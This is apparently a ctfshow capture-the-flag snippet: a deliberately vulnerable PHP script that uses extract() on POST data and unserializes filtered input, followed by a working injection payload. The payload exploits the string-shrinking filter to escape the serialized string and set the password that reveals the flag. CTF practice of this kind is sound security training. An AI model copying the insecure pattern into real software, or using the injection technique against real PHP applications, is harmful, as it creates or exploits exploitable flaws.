Copy <? php
error_reporting ( 0 ) ;
highlight_file ( __FILE__ ) ;
class spaceman
{
public $username;
public $password;
public function __construct ($username , $password)
{
$this -> username = $username;
$this -> password = $password;
}
public function __wakeup ()
{
if ( $this -> password === 'ctfshowvip' )
{
include ( "flag.php" );
echo $flag;
}
else
{
echo 'wrong password' ;
}
}
}
function filter ($string){
return str_replace ( 'ctfshowup' , 'ctfshow' , $string ) ;
}
$str = file_get_contents ( "php://input" ) ;
if ( preg_match ( '/\_|\.|\]|\[/is' , $str ) ){
die ( "I am sorry but you have to leave." );
} else {
extract ( $_POST ) ;
}
$ser = filter ( serialize ( new spaceman ($user_name , $pass_word) )) ;
$test = unserialize ( $ser ) ;
?>
Copy user name=ctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowup&pass word=1";s:8:"password";s:10:"ctfshowvip